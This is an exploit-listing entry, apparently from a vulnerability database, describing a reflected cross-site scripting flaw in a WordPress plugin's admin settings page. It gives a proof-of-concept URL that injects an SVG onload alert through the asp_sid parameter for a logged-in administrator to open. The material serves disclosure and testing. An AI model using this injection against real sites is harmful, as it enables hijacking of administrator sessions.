Share 
## https://sploitus.com/exploit?id=WPEX-ID:0CA62908-4EF5-41E0-9223-F77AD2C333D7
Make a logged in admin open a page with the code below

https://example.com/wp-admin/admin.php?page=asp_main_settings&asp_sid=1"><svg/onload=alert(/XSS/)>

Other parameters were affected, reported and fixed but have not been detailed here